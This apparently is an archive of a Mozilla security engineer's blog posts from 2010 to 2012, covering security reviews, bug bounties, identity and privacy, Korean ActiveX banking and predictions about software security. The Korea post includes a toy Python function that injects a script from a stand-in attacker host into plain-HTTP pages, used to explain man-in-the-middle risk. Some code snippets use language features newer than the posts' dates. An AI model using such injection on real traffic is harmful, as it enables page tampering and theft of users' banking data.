03
Aug 12

Meetings are for discussion, emails are for status

Just a short observation. I don’t think you should ever hold a meeting just to read out status updates. If there isn’t time to meaningfully discuss the topics at hand, there’s no point in holding a meeting. Just send an email, blog it, or post it to a wiki. But please, please don’t invite me to your meeting! Thanks!


14
Sep 11

Perceptions of risk

At Blackhat & Defcon recently I was once again surprised by the number of security professionals who refused to touch a networked device for the duration of the conference. Yes, the risk is elevated and people there might have zero-days. But the risk is also high in airports, coffee shops, and hotels in far-away places. People in some parts of the world live at a constantly high risk of zero-days in their own homes.

How can we be expected to help defend our users (who at most have a small fraction of the security knowledge that we do) in hostile environments if we can’t defend ourselves? Some have called this attitude cavalier or attributed it to hubris, but that’s missing the point.

The point is that either we are overestimating the risk at Blackhat, or underestimating the risk the rest of the time. If a security pro can’t defend themselves in a highly hostile environment, then I claim they can’t defend their users in a moderately hostile one.


12
Jun 11

Regarding your Baby

Having been at Mozilla for some time now, I’m still fascinated by the varying perceptions people have of security reviews. To some developers it feels like the Spanish Inquisition (minus the comfy pillows), while to others it’s an opportunity to uncover potential issues they may have missed during the design or implementation process. The interesting thing is that our approach is pretty much the same for every review.

But it has become evident that we need to do a better job of defining and communicating both the structure and value of the process, in a way that helps each developer maximize the value of their reviews. Among those changes, we are going to try a more structured approach to how we run the meetings.

For a typical 60 minute design review, we will break up the time as follows:

Introduction by the feature team (5-10 minutes)

  1. Goal of the feature. What outcome is it trying to achieve: problems solved, use cases enabled, etc.
  2. The solutions/approaches that were considered
  3. Why this solution was chosen
  4. Any security threats or issues that were considered in the design

The purpose here is to help the security team understand the fundamental motivations and purpose of the feature, thereby setting the correct context for the rest of the conversation. If we don’t know why a feature is proposed, it becomes hard to justify (any) risk. That said, this is not the time to critique the feature. Comments and questions should be saved for later unless they directly relate to understanding the feature better.

Threat brainstorm (30-40 minutes)
A truly open brainstorming session on potential threats the feature could face or introduce. Like any good brainstorming session, it will involve some really interesting ideas as well as some really silly ones. The goal is not to make judgments during this phase; it is to test the feature from every angle. It’s vital for the feature team to participate in a critical analysis (in the classical sense) of their own feature.

Rather than feeling like they need to defend their feature, the feature team should strive to “swap sides” and think like an attacker. Part of the value is helping teams learn to run this questioning process themselves; but also, realistically, there are very few features we know enough about to go through this process without the feature team being represented. The ability to objectively critique one’s baby is a difficult but very valuable skill.

Conclusions and action items (10-20 minutes)
Summarize the threats uncovered, then recommend and prioritize mitigations for each. Identify the parts of the feature that need follow-up security work, which may include detailed threat modeling, source code review, targeted fuzzing, etc.

Formal security reviews are not our only tool, of course. In addition to our ongoing fuzzing and bug bounty programs–and the code review every patch goes through anyway–we also use other approaches, such as embedding security team members into the most complex projects. However, that approach clearly does not scale to anywhere near the number of projects we have. The best approach is often a series of small conversations. Lightweight interactions can be a great way to bounce ideas around and get feedback, helping a team crystallize specific aspects of a feature and prepare for a detailed review in the future.

But the most important characteristic of any type of security interaction is that it happens as early as possible. The earlier we talk, the more options we have to address any significant shortcomings while still shipping what you want, when you want to. The later we talk, the smaller our toolbox becomes, eventually coming down to a single boolean lever: do we ship or not?


11
Jun 11

Choosing Security

Some of the most common reasons I hear from people for coming to Mozilla are “I want to have an impact”, “I want to work on things that matter” and “I want my work to touch lots of people”. Many of us have worked on projects independently and struggled to get anyone to notice, much less care.

Mozilla is a huge platform, a megaphone, for getting noticed. That reach comes from the trust in the Mozilla brand itself, as well as direct access to hundreds of millions of users through our established products. As such, it’s an incredibly appealing avenue for having the impact we desire.

However, with that great power comes great responsibility. Utilizing Mozilla’s brand and reach comes with the duty of ensuring that we are not putting our users at risk or undermining trust in our brand and existing products. That duty is reflected in additional scrutiny and reviews that you would not be subject to if you were doing something completely independently.

Our goal during each project lifecycle is to help each team have the impact they want. The best way to do so is to engage us early and often in your project, and to listen to our feedback. We can help you understand the concerns and challenges you could face not just from Mozilla as an organization, but also from our users, web developers, website admins and the security community. Engaging us proactively maximizes your chances of shipping what you want, when you want to.

Conversely, ignoring recommendations, trying to delay or barrel through the review process or simply bypassing it entirely by releasing stuff through novel channels will likely end in an outcome very different from what you desire.

Please choose wisely!


07
Jun 11

The Uber-Fuzzer

A few weeks ago I had the chance to speak on a panel at the Hack in the Box conference in Amsterdam. For those of you not familiar with the Hack in the Box organization, it’s a great bunch of people who volunteer their time to put together a solid conference. The panel discussed the “Economics of Vulnerabilities”, focusing primarily on the various ways organizations can recognize and compensate independent security researchers. It was a very interesting discussion, and I thank Katie Moussouris from Microsoft, Steve Adegbite from Adobe, Adrian Stone from RIM, Aaron Portnoy from ZDI and Chris Evans from Google for representing.

Since Mozilla has had a bounty program since 2004 (and Netscape started its bounty back in 1995) we obviously have some rather strong opinions about what works. :) It’s been great seeing other software companies adopt various types of security bounty programs: Google (with great enthusiasm), Deutsche Post, Barracuda and others. The economics in our case are pretty straightforward: a researcher who submits to the Mozilla security bug bounty program gets a $3000 reward for every qualifying client bug they find, or between $500 and $3000 for each qualifying web bug. We are not buying a researcher’s silence, however; we are offering a reward for constructive security research. There are no contracts or confidentiality clauses to sign. Of course, prompt payment and public attribution are also very important. :)

No discussion of vulnerability economics can ignore the grey elephant in the room: underground markets. Whether the color of those markets is black, grey or taupe, the fundamental objective of those buyers is to acquire vulnerabilities to use as tools… implements… ok, weapons to achieve specific tactical or strategic objectives, rather than to fix those issues and protect all users. An interesting tidbit that came out during the discussion is that researchers on those markets are now being paid on an ongoing basis for as long as the vulnerability remains non-public and unfixed. This is clearly intended to minimize the odds that the vendor will be able to discover and fix the issue. Something to keep in mind if you choose to go down that route.

The other thing to keep in mind with the underground markets is that they are paying for a fully reliable, weaponized exploit. In most cases this is an order of magnitude more work than simply finding a bug, and frankly something that very few researchers can actually achieve (per Aaron Portnoy of ZDI). At Mozilla we don’t need–or even want, honestly–a working exploit. We just need sufficient detail to understand and locate the bug. In most cases a simple test case demonstrating memory corruption or an assertion, or just referencing the offending lines of code is enough. Meaning a whole lot less hassle for the researcher.

This all has some rather profound implications for vendors. No longer can one expect that a zero-day will be monetized through rootkits that get sprayed across the internet, quickly alerting the vendor to the issue and allowing for a fix. Every incentive seems aligned to keep these bugs off the radar for as long as possible, meaning a quick response is no longer a sufficient primary strategy. Vendors must pursue a wide variety of means to find and fix all of those issues proactively, and not sit on bugs under the false hope that nobody else will find them. A bug bounty is a critical part of that strategy for Mozilla. It works for the same reason fuzzing works: it maximizes the potential set of inputs into the problem, greatly improving the chances of finding security bugs through unique and innovative means. Security bounty programs are the “uber-fuzzer”.
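
To make the fuzzing analogy concrete, here’s a minimal sketch of a mutation fuzzer (a toy illustration of the principle, not any of our actual tools; `parse` is a stand-in for whatever code is under test):

```python
import random

def mutate(seed: bytes, flips: int = 4) -> bytes:
    # Randomly corrupt a few bytes of a known-good input.
    data = bytearray(seed)
    for _ in range(flips):
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

def fuzz(parse, seed: bytes, iterations: int = 100_000) -> list:
    # Throw mutated inputs at the code under test, collecting every
    # input that triggers a crash (here, any unhandled exception).
    crashes = []
    for _ in range(iterations):
        candidate = mutate(seed)
        try:
            parse(candidate)
        except Exception as exc:
            crashes.append((candidate, exc))
    return crashes

# Hypothetical usage:
# crashes = fuzz(my_parser, seed=open("good.input", "rb").read())
```

A bounty program does the same thing one level up: instead of randomizing the inputs, it randomizes the people, tools and techniques pointed at the code.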


16
Jul 10

Contextual Identity

We’ve been thinking and discussing, and then thinking some more, about both privacy and identity at Mozilla. So far we have generally been treating them as two separate sets of issues, but I’m beginning to wonder if there might be another way to think about this.

People have been trying various ways of addressing privacy concerns on the web. These approaches have generally consisted of mechanisms to permit a website and/or user to define and communicate a privacy policy in some digestible way, and then optionally negotiate some happy middle ground (or not). P3P was probably the most ambitious attempt to crack this nut, without much success. I won’t try to rehash these various proposals here nor speculate as to why each has so far largely failed.

Instead, let’s try a different tack. What if privacy is really just an aspect of identity?

One hypothesis: people don’t have a single identity… in the real world, or online. Who you fundamentally represent yourself to be (in terms of name, accuracy of location, age, social demographics, etc.) varies depending on the context. This is true whether you are interacting online with a bank vs. an online hobby forum vs. craigslist, and true whether you are interacting with your close family vs. coworkers vs. random strangers in the elevator.

In each of those scenarios, you are projecting a different “view” of your underlying self that you feel is appropriate for the given context. Even in situations of relatively equal trust and confidence, say with your parents vs. your significant other, you are sharing information on a fundamentally different basis in terms of how you are presenting it, how you want to be perceived and how much detail and honesty you are willing to provide, even when the topic is the same. In Plato’s Cave, we are putting on a unique shadow play for each audience. I’m sure there is a formal academic definition of this, but lacking that at the moment I’ll just call this the “contextual identity”.

The desire to be perceived in a certain way inherently includes a set of privacy expectations, or put another way, an individual’s implicit privacy policy in a given context. This is where people often run into privacy problems online: either their expectation of their identity in a given context is not accurate (i.e. they are sharing far more, or very different types of, information than they intended to), or they are sharing it in a different context (e.g. embarrassing party photos are viewed by a potential employer).

So maybe it’s not a surprise that many social networks have ended up with privacy egg on their faces. Part of the problem is that by presuming that users should have only a single, canonical identity on their network (and indeed, often across the entire web), they lack the flexibility for individuals to express their various identities appropriately in different contexts.

So what if you could in fact maintain a set of identities, each accurately reflecting your desired identity in a given context? Then you could seamlessly interact with a wide range of services, from commenting on news sites in a relatively anonymous setting, to sharing health information with your family or doing online banking, each a relatively confidential and trusted interaction, yet still fundamentally different. After all, your family shouldn’t necessarily know your current bank balance and conversely, your bank doesn’t need to know about your health.

Who would you trust with managing this set of identities, though? Your favorite social network? The problem with that is this trusted provider would need to be aware of the superset of your desired identities, which likely includes identities that are more sensitive than you’d be willing to share with said networks. Given that social networks are relatively low in the grand hierarchy of trust (for me, anyway), they seem like poor receptacles for this degree of trust.

The best entity to trust with this information is, oddly enough, yourself. The ideal solution would be locally managed on the user’s system, but securely and seamlessly synchronized across your devices. This model has some important positive characteristics.

For one, the entity atop this hierarchy of trust is: you. Obviously you also need to trust the software you use, but that is the tremendous power of open source software. Since you can inspect the source code and build your own version of any open source package, you can actually trust its behavior. That is only possible for closed-source, locally-installed software with immense skill and effort in reverse engineering… and mostly impossible for remotely hosted web apps.

The other reason is that because you control all these disparate identities, you can choose which of them can be associated with each other, and under what context. For example, I might be OK with my social network identity being associated with my blogging identity, but I probably don’t want either to be aware of any of my banking identities.
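
As a sketch of what such a locally managed store might look like (purely hypothetical names and structure, not a real or proposed Mozilla API):

```python
from dataclasses import dataclass, field

@dataclass
class Identity:
    # One contextual "view" of yourself: a label for the context plus
    # whatever attributes you choose to reveal in that context.
    label: str
    attributes: dict = field(default_factory=dict)

@dataclass
class IdentityStore:
    # A locally managed set of identities plus an explicit linkage
    # policy: which pairs of identities may ever be associated.
    identities: dict = field(default_factory=dict)
    linkable: set = field(default_factory=set)

    def add(self, identity: Identity) -> None:
        self.identities[identity.label] = identity

    def allow_link(self, a: str, b: str) -> None:
        self.linkable.add(frozenset((a, b)))

    def may_associate(self, a: str, b: str) -> bool:
        return frozenset((a, b)) in self.linkable

store = IdentityStore()
store.add(Identity("blogging", {"name": "jsmith"}))
store.add(Identity("social", {"name": "J. Smith"}))
store.add(Identity("banking", {"name": "Jane Smith"}))
store.allow_link("social", "blogging")               # fine to associate
assert not store.may_associate("banking", "social")  # but never these two
```

The linkage policy is the key piece: association is forbidden by default and must be granted explicitly, pair by pair, by the user.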

Sounds great, right? Maybe… or maybe not. Either way, let me know! So what’s next, you ask?

Hmm, we’ll see. Stay tuned… :)


09
May 10

Korea: 1995 -> 2010

Last week I had the opportunity to travel to Korea to speak at a short conference regarding the unique Korean authentication requirements for banks and e-commerce. The rules originated in the mid-90s, in response to a perceived lack of finalized standards around SSL and US crypto export restrictions. They mandated the use of the proprietary 128-bit cipher SEED (http://en.wikipedia.org/wiki/SEED) implemented in the form of plugins and ActiveX controls, along with client certificates for authentication.

Today this has resulted in a system that largely ignores HTTPS and relies on user authentication, channel encryption and transaction signing via proprietary ActiveX controls (plugin equivalents fell out of favor after Netscape lost the browser war, though there has been some renewed interest in them lately). This model implies some serious usability issues, namely that users are left with Windows and IE as the only viable platform for serious web browsing. Not just IE, but often older versions of IE, since many of these ActiveX controls don’t support newer versions of IE and Windows. The irony is that one of the most technologically advanced free societies is forced to use the worst possible browser from a general usability and security standpoint. Mobile devices generally don’t support this model either, although banks are now starting to build dedicated apps for the more popular devices.

This also has some unfortunate security implications. While the model may have seemed reasonable given the crypto restrictions and threat models of the mid-90s, and was even advanced in many respects, the end result of its struggle to keep up with the evolving web threat model is an odd Rube Goldberg-esque system of part-time anti-malware, anti-keylogging, and excessive faith in the strength of client certificates as a non-repudiation mechanism.

The reality of the model is that, since the HTML interface is delivered over HTTP, any man-in-the-middle (MITM) attacker can inject their own HTML or JavaScript into the content, and then display their own dialogs to the user, prompt the user to install a malicious ActiveX control, or prevent the intended controls from running. Or just hang out quietly and steal any information the user sees via HTML, which includes information like bank accounts, balances, transaction history, etc. The user has no way of detecting that this has happened, nor can they do anything to prevent it.
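
To illustrate just how little the attacker has to do, here is a deliberately toy sketch (a real MITM rewrites the response in flight on the network rather than calling a function, and attacker.example is a made-up host):

```python
PAYLOAD = b'<script src="http://attacker.example/x.js"></script>'

def inject(html: bytes, payload: bytes = PAYLOAD) -> bytes:
    # An on-path attacker can rewrite any plain-HTTP response body.
    # Splicing a script tag in before </body> hands the attacker full
    # control of the page; nothing in HTTP lets the user or the bank
    # detect that the content was modified in transit.
    return html.replace(b"</body>", payload + b"</body>")

page = b"<html><body>Balance: ...</body></html>"
print(inject(page).decode())
```

HTTPS exists precisely to take this capability away, which is why delivering the banking UI over plain HTTP undermines everything layered on top of it.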

The recent Korean launch and popularity of foreign mobile devices has driven a lot of interest in alternative browsers and platforms, and it turns out that the Korean people are already well aware of the usability and choice penalties imposed by the current model. So my talk focused primarily on the security shortcomings of the current model, and especially entire parts of the threat model that are not being addressed, such as content integrity and confidentiality.

The subsequent coverage was quite positive, though the only English-language article I’m aware of is here: http://www.koreatimes.co.kr/www/news/biz/2010/04/123_65102.html

My presentation is available here: https://wiki.mozilla.org/images/6/61/Korea.pdf
Also presented was a paper by two young researchers from Oxford that goes into more technical detail: http://www.comlab.ox.ac.uk/publications/publication3442-abstract.html

For some excellent background on this topic, check out:
Gen Kanai’s blog – http://blog.mozilla.org/gen/category/korea/
Channy Yun’s article – http://webstandards.or.kr/2007/03/17/korean-home-brew-on-the-web/


22
Jan 10

Evolution of Software Security – Predictions for 2020

Attackers will become increasingly efficient at discovering & exploiting vulnerabilities, even as application developers continue to try to reduce the attack surface. This has several implications:

  • Attackers will depend less on random manual testing to find vulnerabilities. Instead, they will find new, lazy yet creative ways of discovering vulnerabilities: mining public crash reports, bug repositories and other public sources of information for clues to potential issues; spearphishing developers, corporations and other individuals with sensitive security information (to steal security bug information or gain/elevate access privileges to source code); and using off-the-shelf security software to analyze potential targets. Call it laziness; I call it efficiency.
  • Attackers will become increasingly efficient at deploying exploits, putting serious pressure on software vendors to compress release and update cycles. We are already seeing the acceptable update window shrink from 30 days or more down to 24 hours, and it will come under further pressure. By 2020 I expect acceptable update windows will be measured in an hour or two, and likely even minutes for high-profile target applications.
  • The focus will shift away from bug counting as a metric, towards actual exposure risk. Something like the number of open security bugs multiplied by the average window of time from bug discovery to when the fix has been deployed to 80% of the user base (just a hypothetical example, sketched after this list; the real metrics will likely be more complicated). This would require vendors to agree on common metrics and severity ratings, and to become far more transparent and willing to share more information than they have been thus far, so perhaps it’s not a particularly realistic prediction. :)
  • Software companies will hopefully become more effective at putting security into context with other business objectives.  While this seems like an obvious thing to do, too many companies treat security as practically an aspect of PR, rather than serious engineering work that requires tradeoffs in other areas of product development.
  • Valuable information will continue migrating up the stack; so will valuable exploits. Much has been made of process isolation / sandboxing technologies, and they do help. However, as more critical information is stored on the web rather than on local systems, exploits that execute with just “content” privileges (i.e. the context they run within has access to the network and credentials/cookies, but not the filesystem or other critical OS resources) will increasingly be considered “good enough.” Expect to see more investment in exploit frameworks that focus on weaponizing information-stealing exploits that run within limited-privilege processes.
  • Fuzzing will become an increasingly commoditized technology and skill-set, so software vendors should not become complacent and assume technical superiority.
  • Software companies that rely on “checklist security” processes and talking heads rather than deep technical security competence will suffer terribly as the sophistication of attackers ramps up, and their internal processes and teams cannot keep pace.
  • Deployment of exploits will become sophisticated to the point that attackers will have a quiver of exploits that they selectively deploy against specific application versions, only serving them against high-value targets. This means software vendors need to fix issues quickly; they cannot afford to sit on bugs they know about, as the first indication that a bug has been externally discovered will likely be its use in a high-profile, targeted attack.
  • This will increase the value of zero-day exploits, as they provide first-mover advantage against sophisticated and well-defended targets. These exploits will rarely be wasted on the more common “shotgun” exploit economy that shoots at anything that moves (for purposes of building botnets for fun and profit, stealing email and WoW accounts, individual bank accounts, etc). That “exploit mass market” will focus increasingly on high-volume exploitation of known issues in applications and platforms with slow update uptake rates, while niche players will focus on zero-days for international and corporate espionage.
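
On the exposure-risk metric mentioned above, here is a minimal sketch of the hypothetical “open bugs × exposure window” arithmetic (my own illustrative numbers, not data from any vendor):

```python
def exposure_risk(open_security_bugs: int, days_to_80pct_deployed: float) -> float:
    # Hypothetical metric from the list above: open security bugs
    # multiplied by the average window from bug discovery until the
    # fix reaches 80% of the user base. Units: bug-days of exposure.
    return open_security_bugs * days_to_80pct_deployed

# Fewer bugs with a slow update pipeline can still mean more exposure
# than more bugs that are fixed and deployed quickly.
vendor_a = exposure_risk(10, 60.0)  # 600 bug-days
vendor_b = exposure_risk(30, 5.0)   # 150 bug-days
```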

The above pontifications are purely my own opinions and are likely neither representative of nor shared by others.